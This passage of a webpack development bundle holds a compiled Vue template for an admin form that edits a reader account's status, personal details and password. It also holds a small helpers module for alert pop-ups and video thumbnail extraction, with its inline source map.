disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_banned,\n                    callback: function($$v) {\n                      _vm.sync_banned = $$v\n                    },\n                    expression: \"sync_banned\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"label\", [_vm._v(\"Visible?\")]),\n                _vm._v(\" \"),\n                _c(\"InputSwitch\", {\n                  staticClass: \"mr-2\",\n                  attrs: { disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_visible,\n                    callback: function($$v) {\n                      _vm.sync_visible = $$v\n                    },\n                    expression: \"sync_visible\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"label\", [_vm._v(\"Approved?\")]),\n                _vm._v(\" \"),\n                _c(\"InputSwitch\", {\n                  staticClass: \"mr-2\",\n                  attrs: { disabled: !_vm.isUpdating },\n                  model: {\n                    value: _vm.sync_approved,\n                    callback: function($$v) {\n                      _vm.sync_approved = $$v\n                    },\n                    expression: \"sync_approved\"\n                  }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"form-group row  col-md-4 mx-auto mt-3\" }, [\n            _vm.isUpdating\n              ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-secondary w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.cancelUpdate()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Cancel\\n          \")]\n                  )\n                ])\n              : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-danger w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.removeAccount()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Remove Account\\n          \")]\n                  )\n                ]),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n              [\n                !_vm.isUpdating\n                  ? _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-primary w-100\",\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            _vm.isUpdating = true\n                          }\n                        }\n                      },\n                      [\n                        _vm._v(\n                          \"\\n            \" +\n                            _vm._s(_vm.$t(\"update\")) +\n                            \"\\n          \"\n                        )\n                      ]\n                    )\n                  : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                      _vm._v(\"\\n            Confirm\\n          \")\n                    ])\n              ],\n              1\n            )\n          ])\n        ])\n      ]\n    ),\n    _vm._v(\" \"),\n    _c(\"hr\", { staticClass: \" mt-5\" }),\n    _vm._v(\" \"),\n    _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Additional Information\")]),\n    _vm._v(\" \"),\n    _c(\n      \"form\",\n      {\n        on: {\n          submit: function($event) {\n            $event.preventDefault()\n            return _vm.updateAdditional($event)\n          },\n          keydown: function($event) {\n            return _vm.additionalForm.onKeydown($event)\n          }\n        }\n      },\n      [\n        _c(\"div\", { staticClass: \"row\" }, [\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Address\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.address,\n                      expression: \"additionalForm.address\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"address\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"address\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.address },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(\n                        _vm.additionalForm,\n                        \"address\",\n                        $event.target.value\n                      )\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"address1\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"State/Province\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.state,\n                      expression: \"additionalForm.state\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"state\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"state\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.state },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.additionalForm, \"state\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"state\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"ZIP/Postal Code\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.zip,\n                      expression: \"additionalForm.zip\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: { \"is-invalid\": _vm.additionalForm.errors.has(\"zip\") },\n                  attrs: {\n                    type: \"text\",\n                    name: \"zip\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.zip },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.additionalForm, \"zip\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"zip\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Country\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.additionalForm.country,\n                      expression: \"additionalForm.country\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"country\")\n                  },\n                  attrs: {\n                    type: \"text\",\n                    name: \"country\",\n                    readonly: !_vm.isAdditionalUpdating\n                  },\n                  domProps: { value: _vm.additionalForm.country },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(\n                        _vm.additionalForm,\n                        \"country\",\n                        $event.target.value\n                      )\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"country\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Birthdate\")))]),\n                _vm._v(\" \"),\n                _c(\"birth-datepicker\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.additionalForm.errors.has(\"birthdate\")\n                  },\n                  attrs: {\n                    name: \"birthdate\",\n                    disabled: !_vm.isAdditionalUpdating\n                  },\n                  model: {\n                    value: _vm.additionalForm.birthdate,\n                    callback: function($$v) {\n                      _vm.$set(_vm.additionalForm, \"birthdate\", $$v)\n                    },\n                    expression: \"additionalForm.birthdate\"\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalform, field: \"birthdate\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto\" },\n              [\n                _c(\"label\", [_vm._v(\"Gender\")]),\n                _vm._v(\" \"),\n                _c(\n                  \"select\",\n                  {\n                    directives: [\n                      {\n                        name: \"model\",\n                        rawName: \"v-model\",\n                        value: _vm.additionalForm.gender,\n                        expression: \"additionalForm.gender\"\n                      }\n                    ],\n                    staticClass: \"form-control\",\n                    attrs: {\n                      id: \"gender\",\n                      required: \"\",\n                      disabled: !_vm.isAdditionalUpdating\n                    },\n                    on: {\n                      change: function($event) {\n                        var $$selectedVal = Array.prototype.filter\n                          .call($event.target.options, function(o) {\n                            return o.selected\n                          })\n                          .map(function(o) {\n                            var val = \"_value\" in o ? o._value : o.value\n                            return val\n                          })\n                        _vm.$set(\n                          _vm.additionalForm,\n                          \"gender\",\n                          $event.target.multiple\n                            ? $$selectedVal\n                            : $$selectedVal[0]\n                        )\n                      }\n                    }\n                  },\n                  _vm._l(_vm.genders, function(gender) {\n                    return _c(\n                      \"option\",\n                      { key: gender.id, domProps: { value: gender.id } },\n                      [\n                        _vm._v(\n                          \"\\n              \" +\n                            _vm._s(gender.name) +\n                            \"\\n            \"\n                        )\n                      ]\n                    )\n                  }),\n                  0\n                ),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.additionalForm, field: \"gender\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _vm.isAdditionalUpdating\n            ? _c(\n                \"div\",\n                { staticClass: \"form-group row  col-md-4 mx-auto mt-3\" },\n                [\n                  _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                    _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-secondary w-100\",\n                        attrs: { type: \"button\" },\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            return _vm.cancelUpdate()\n                          }\n                        }\n                      },\n                      [_vm._v(\"\\n          Cancel\\n          \")]\n                    )\n                  ]),\n                  _vm._v(\" \"),\n                  _c(\n                    \"div\",\n                    { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n                    [\n                      _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                        _vm._v(\"\\n            Confirm\\n          \")\n                      ])\n                    ],\n                    1\n                  )\n                ]\n              )\n            : _c(\n                \"div\",\n                { staticClass: \"form-group row  col-md-4 mx-auto mt-3\" },\n                [\n                  _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                    _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-secondary w-100\",\n                        attrs: { type: \"button\" },\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            return _vm.cancelUpdate()\n                          }\n                        }\n                      },\n                      [_vm._v(\"\\n          Cancel\\n          \")]\n                    )\n                  ]),\n                  _vm._v(\" \"),\n                  _c(\n                    \"div\",\n                    { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n                    [\n                      _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                        _vm._v(\"\\n            Confirm\\n          \")\n                      ])\n                    ],\n                    1\n                  )\n                ]\n              )\n        ])\n      ]\n    ),\n    _vm._v(\" \"),\n    _c(\"hr\", { staticClass: \" mt-5\" }),\n    _vm._v(\" \"),\n    _c(\"h5\", { staticClass: \"mb-3\" }, [_vm._v(\"Update Password\")]),\n    _vm._v(\" \"),\n    _c(\n      \"form\",\n      {\n        on: {\n          submit: function($event) {\n            $event.preventDefault()\n            return _vm.update($event)\n          },\n          keydown: function($event) {\n            return _vm.readerForm.onKeydown($event)\n          }\n        }\n      },\n      [\n        _c(\"div\", { staticClass: \"row\" }, [\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"password\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  directives: [\n                    {\n                      name: \"model\",\n                      rawName: \"v-model\",\n                      value: _vm.readerForm.password,\n                      expression: \"readerForm.password\"\n                    }\n                  ],\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"password\")\n                  },\n                  attrs: {\n                    type: \"password\",\n                    name: \"password\",\n                    readonly: !_vm.isUpdating\n                  },\n                  domProps: { value: _vm.readerForm.password },\n                  on: {\n                    input: function($event) {\n                      if ($event.target.composing) {\n                        return\n                      }\n                      _vm.$set(_vm.readerForm, \"password\", $event.target.value)\n                    }\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"password\" }\n                })\n              ],\n              1\n            ),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Confirm Password\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"confirm-password\")\n                  },\n                  attrs: {\n                    type: \"password\",\n                    name: \"confirmPassword\",\n                    readonly: !_vm.isUpdating\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"confirmPassword\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"col-md-6\" }, [\n            _c(\n              \"div\",\n              { staticClass: \"form-group col-md-11 mx-auto mx-auto  \" },\n              [\n                _c(\"label\", [_vm._v(_vm._s(_vm.$t(\"Current Password\")))]),\n                _vm._v(\" \"),\n                _c(\"input\", {\n                  staticClass: \"form-control\",\n                  class: {\n                    \"is-invalid\": _vm.readerForm.errors.has(\"current-password\")\n                  },\n                  attrs: {\n                    type: \"password\",\n                    name: \"currentPassword\",\n                    readonly: !_vm.isUpdating\n                  }\n                }),\n                _vm._v(\" \"),\n                _c(\"has-error\", {\n                  attrs: { form: _vm.readerForm, field: \"currentPassword\" }\n                })\n              ],\n              1\n            )\n          ]),\n          _vm._v(\" \"),\n          _c(\"div\", { staticClass: \"form-group row col-md-4 mx-auto mt-3\" }, [\n            _vm.isUpdating\n              ? _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-secondary w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.cancelUpdate()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Cancel\\n          \")]\n                  )\n                ])\n              : _c(\"div\", { staticClass: \"col-md-6 px-0 pr-lg-1\" }, [\n                  _c(\n                    \"button\",\n                    {\n                      staticClass: \"btn btn-danger w-100\",\n                      attrs: { type: \"button\" },\n                      on: {\n                        click: function($event) {\n                          $event.preventDefault()\n                          return _vm.removeAccount()\n                        }\n                      }\n                    },\n                    [_vm._v(\"\\n          Remove Account\\n          \")]\n                  )\n                ]),\n            _vm._v(\" \"),\n            _c(\n              \"div\",\n              { staticClass: \"col-md-6 px-0 pl-lg-1 ml-md-auto\" },\n              [\n                !_vm.isUpdating\n                  ? _c(\n                      \"button\",\n                      {\n                        staticClass: \"btn btn-primary w-100\",\n                        on: {\n                          click: function($event) {\n                            $event.preventDefault()\n                            _vm.isUpdating = true\n                          }\n                        }\n                      },\n                      [\n                        _vm._v(\n                          \"\\n          \" +\n                            _vm._s(_vm.$t(\"update\")) +\n                            \"\\n          \"\n                        )\n                      ]\n                    )\n                  : _c(\"v-button\", { staticClass: \"btn btn-primary w-100\" }, [\n                      _vm._v(\"\\n          Confirm\\n          \")\n                    ])\n              ],\n              1\n            )\n          ])\n        ])\n      ]\n    )\n  ])\n}\nvar staticRenderFns = []\nrender._withStripped = true\n\nexport { render, staticRenderFns }"],"sourceRoot":""}\n//# sourceURL=webpack-internal:///./node_modules/vue-loader/lib/loaders/templateLoader.js?!./node_modules/vue-loader/lib/index.js?!./resources/js/pages/admin/reader/reader-form.vue?vue&type=template&id=14c15a6b&\n");
/***/ }),
/***/ "./resources/js/helpers/index.js":
/*!***************************************!*\
!*** ./resources/js/helpers/index.js ***!
\***************************************/
/*! exports provided: swalOops, swalSuccess, createObjectURL, videoToBlob, blobVideoToBlobThumbnail */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
eval("__webpack_require__.r(__webpack_exports__);\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"swalOops\", function() { return swalOops; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"swalSuccess\", function() { return swalSuccess; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"createObjectURL\", function() { return createObjectURL; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"videoToBlob\", function() { return videoToBlob; });\n/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, \"blobVideoToBlobThumbnail\", function() { return blobVideoToBlobThumbnail; });\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(/*! @babel/runtime/regenerator */ \"./node_modules/@babel/runtime/regenerator/index.js\");\n/* harmony import */ var _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default = /*#__PURE__*/__webpack_require__.n(_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0__);\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(/*! sweetalert2 */ \"./node_modules/sweetalert2/dist/sweetalert2.all.js\");\n/* harmony import */ var sweetalert2__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(sweetalert2__WEBPACK_IMPORTED_MODULE_1__);\n/* harmony import */ var video_metadata_thumbnails__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(/*! video-metadata-thumbnails */ \"./node_modules/video-metadata-thumbnails/lib/video-metadata-thumbnails.es.js\");\n\n\nfunction asyncGeneratorStep(gen, resolve, reject, _next, _throw, key, arg) { try { var info = gen[key](arg); var value = info.value; } catch (error) { reject(error); return; } if (info.done) { resolve(value); } else { Promise.resolve(value).then(_next, _throw); } }\n\nfunction _asyncToGenerator(fn) { return function () { var self = this, args = arguments; return new Promise(function (resolve, reject) { var gen = fn.apply(self, args); function _next(value) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"next\", value); } function _throw(err) { asyncGeneratorStep(gen, resolve, reject, _next, _throw, \"throw\", err); } _next(undefined); }); }; }\n\n\n\nvar swalOops = function swalOops() {\n var message = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'Something went wrong!';\n return sweetalert2__WEBPACK_IMPORTED_MODULE_1___default.a.fire({\n title: \"Oops!\",\n text: message,\n icon: \"error\"\n });\n};\nvar swalSuccess = function swalSuccess() {\n var message = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : 'Action successfuly finished!';\n return sweetalert2__WEBPACK_IMPORTED_MODULE_1___default.a.fire({\n title: \"Success!\",\n text: message,\n icon: \"success\"\n });\n};\nvar createObjectURL = function createObjectURL(object) {\n // convert video url to blob\n return window.URL ? window.URL.createObjectURL(object) : window.webkitURL.createObjectURL(object);\n};\nvar videoToBlob = /*#__PURE__*/function () {\n var _ref = _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee(videoStream) {\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee$(_context) {\n while (1) {\n switch (_context.prev = _context.next) {\n case 0:\n _context.next = 2;\n return fetch(videoStream).then(function (r) {\n return r.blob();\n });\n\n case 2:\n return _context.abrupt(\"return\", _context.sent);\n\n case 3:\n case \"end\":\n return _context.stop();\n }\n }\n }, _callee);\n }));\n\n return function videoToBlob(_x) {\n return _ref.apply(this, arguments);\n };\n}();\nvar blobVideoToBlobThumbnail = /*#__PURE__*/function () {\n var _ref2 = _asyncToGenerator( /*#__PURE__*/_babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.mark(function _callee2(blob) {\n var thumbnails;\n return _babel_runtime_regenerator__WEBPACK_IMPORTED_MODULE_0___default.a.wrap(function _callee2$(_context2) {\n while (1) {\n switch (_context2.prev = _context2.next) {\n case 0:\n _context2.next = 2;\n return Object(video_metadata_thumbnails__WEBPACK_IMPORTED_MODULE_2__[\"getThumbnails\"])(blob, {\n interval: 1,\n start: 2,\n end: 3\n });\n\n case 2:\n thumbnails = _context2.sent;\n return _context2.abrupt(\"return\", thumbnails[0]['blob']);\n\n case 4:\n case \"end\":\n return _context2.stop();\n }\n }\n }, _callee2);\n }));\n\n return function blobVideoToBlobThumbnail(_x2) {\n return _ref2.apply(this, arguments);\n };\n}();//# sourceURL=[module]\n//# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vLi9yZXNvdXJjZXMvanMvaGVscGVycy9pbmRleC5qcz9iNzE3Il0sIm5hbWVzIjpbInN3YWxPb3BzIiwibWVzc2FnZSIsIlN3YWwiLCJmaXJlIiwidGl0bGUiLCJ0ZXh0IiwiaWNvbiIsInN3YWxTdWNjZXNzIiwiY3JlYXRlT2JqZWN0VVJMIiwib2JqZWN0Iiwid2luZG93IiwiVVJMIiwid2Via2l0VVJMIiwidmlkZW9Ub0Jsb2IiLCJ2aWRlb1N0cmVhbSIsImZldGNoIiwidGhlbiIsInIiLCJibG9iIiwiYmxvYlZpZGVvVG9CbG9iVGh1bWJuYWlsIiwiZ2V0VGh1bWJuYWlscyIsImludGVydmFsIiwic3RhcnQiLCJlbmQiLCJ0aHVtYm5haWxzIl0sIm1hcHBpbmdzIjoiOzs7Ozs7Ozs7Ozs7Ozs7OztBQUFBO0FBQ0E7QUFFTyxJQUFNQSxRQUFRLEdBQUcsU0FBWEEsUUFBVyxHQUF1QztBQUFBLE1BQXRDQyxPQUFzQyx1RUFBNUIsdUJBQTRCO0FBQzNELFNBQU9DLGtEQUFJLENBQUNDLElBQUwsQ0FBVTtBQUNiQyxTQUFLLEVBQUUsT0FETTtBQUViQyxRQUFJLEVBQUVKLE9BRk87QUFHYkssUUFBSSxFQUFFO0FBSE8sR0FBVixDQUFQO0FBS0gsQ0FOTTtBQVFBLElBQU1DLFdBQVcsR0FBRyxTQUFkQSxXQUFjLEdBQThDO0FBQUEsTUFBN0NOLE9BQTZDLHVFQUFuQyw4QkFBbUM7QUFDckUsU0FBT0Msa0RBQUksQ0FBQ0MsSUFBTCxDQUFVO0FBQ2JDLFNBQUssRUFBRSxVQURNO0FBRWJDLFFBQUksRUFBRUosT0FGTztBQUdiSyxRQUFJLEVBQUU7QUFITyxHQUFWLENBQVA7QUFLSCxDQU5NO0FBUUEsSUFBTUUsZUFBZSxHQUFHLFNBQWxCQSxlQUFrQixDQUFDQyxNQUFELEVBQVk7QUFBRTtBQUN6QyxTQUFRQyxNQUFNLENBQUNDLEdBQVIsR0FBZUQsTUFBTSxDQUFDQyxHQUFQLENBQVdILGVBQVgsQ0FBMkJDLE1BQTNCLENBQWYsR0FBb0RDLE1BQU0sQ0FBQ0UsU0FBUCxDQUFpQkosZUFBakIsQ0FBaUNDLE1BQWpDLENBQTNEO0FBQ0gsQ0FGTTtBQUlBLElBQU1JLFdBQVc7QUFBQSxvSEFBRyxpQkFBT0MsV0FBUDtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQSxtQkFDVkMsS0FBSyxDQUFDRCxXQUFELENBQUwsQ0FBbUJFLElBQW5CLENBQXdCLFVBQUFDLENBQUM7QUFBQSxxQkFBSUEsQ0FBQyxDQUFDQyxJQUFGLEVBQUo7QUFBQSxhQUF6QixDQURVOztBQUFBO0FBQUE7O0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsR0FBSDs7QUFBQSxrQkFBWEwsV0FBVztBQUFBO0FBQUE7QUFBQSxHQUFqQjtBQUlBLElBQU1NLHdCQUF3QjtBQUFBLHFIQUFHLGtCQUFPRCxJQUFQO0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsbUJBQ1hFLCtFQUFhLENBQUNGLElBQUQsRUFBTztBQUN6Q0csc0JBQVEsRUFBRSxDQUQrQjtBQUV6Q0MsbUJBQUssRUFBRSxDQUZrQztBQUd6Q0MsaUJBQUcsRUFBRTtBQUhvQyxhQUFQLENBREY7O0FBQUE7QUFDOUJDLHNCQUQ4QjtBQUFBLDhDQU83QkEsVUFBVSxDQUFDLENBQUQsQ0FBVixDQUFjLE1BQWQsQ0FQNkI7O0FBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEsR0FBSDs7QUFBQSxrQkFBeEJMLHdCQUF3QjtBQUFBO0FBQUE7QUFBQSxHQUE5QiIsImZpbGUiOiIuL3Jlc291cmNlcy9qcy9oZWxwZXJzL2luZGV4LmpzLmpzIiwic291cmNlc0NvbnRlbnQiOlsiaW1wb3J0IFN3YWwgZnJvbSAnc3dlZXRhbGVydDInO1xyXG5pbXBvcnQgeyBnZXRNZXRhZGF0YSwgZ2V0VGh1bWJuYWlscyB9IGZyb20gJ3ZpZGVvLW1ldGFkYXRhLXRodW1ibmFpbHMnO1xyXG5cclxuZXhwb3J0IGNvbnN0IHN3YWxPb3BzID0gKG1lc3NhZ2UgPSAnU29tZXRoaW5nIHdlbnQgd3JvbmchJykgPT4ge1xyXG4gICAgcmV0dXJuIFN3YWwuZmlyZSh7XHJcbiAgICAgICAgdGl0bGU6IFwiT29wcyFcIixcclxuICAgICAgICB0ZXh0OiBtZXNzYWdlLFxyXG4gICAgICAgIGljb246IFwiZXJyb3JcIixcclxuICAgICAgfSk7XHJcbn1cclxuXHJcbmV4cG9ydCBjb25zdCBzd2FsU3VjY2VzcyA9IChtZXNzYWdlID0gJ0FjdGlvbiBzdWNjZXNzZnVseSBmaW5pc2hlZCEnKSA9PiB7XHJcbiAgICByZXR1cm4gU3dhbC5maXJlKHtcclxuICAgICAgICB0aXRsZTogXCJTdWNjZXNzIVwiLFxyXG4gICAgICAgIHRleHQ6IG1lc3NhZ2UsXHJcbiAgICAgICAgaWNvbjogXCJzdWNjZXNzXCIsXHJcbiAgICB9KTtcclxufVxyXG5cclxuZXhwb3J0IGNvbnN0IGNyZWF0ZU9iamVjdFVSTCA9IChvYmplY3QpID0+IHsgLy8gY29udmVydCB2aWRlbyB1cmwgdG8gYmxvYlxyXG4gICAgcmV0dXJuICh3aW5kb3cuVVJMKSA/IHdpbmRvdy5VUkwuY3JlYXRlT2JqZWN0VVJMKG9iamVjdCkgOiB3aW5kb3cud2Via2l0VVJMLmNyZWF0ZU9iamVjdFVSTChvYmplY3QpO1xyXG59XHJcblxyXG5leHBvcnQgY29uc3QgdmlkZW9Ub0Jsb2IgPSBhc3luYyAodmlkZW9TdHJlYW0pID0+IHtcclxuICAgIHJldHVybiBhd2FpdCBmZXRjaCh2aWRlb1N0cmVhbSkudGhlbihyID0+IHIuYmxvYigpKVxyXG59XHJcblxyXG5leHBvcnQgY29uc3QgYmxvYlZpZGVvVG9CbG9iVGh1bWJuYWlsID0gYXN5bmMgKGJsb2IpID0+IHtcclxuICAgIGNvbnN0IHRodW1ibmFpbHMgPSBhd2FpdCBnZXRUaHVtYm5haWxzKGJsb2IsIHtcclxuICAgICAgICBpbnRlcnZhbDogMSxcclxuICAgICAgICBzdGFydDogMixcclxuICAgICAgICBlbmQ6IDNcclxuICAgIH0pO1xyXG5cclxuICAgIHJldHVybiB0aHVtYm5haWxzWzBdWydibG9iJ11cclxufSJdLCJzb3VyY2VSb290IjoiIn0=\n//# sourceURL=webpack-internal:///./resources/js/helpers/index.js\n");
/***/ }),
/***/ "./resources/js/pages/admin/reader/reader-form.vue":
/*!*********************************************************!*\
!*** ./resources/js/pages/admin/reader/reader-form.vue ***!
\*********************************************************/
/*! exports provided: default */
/***/ (function(module, __webpack_exports__, __webpack_require__) {
"use strict";
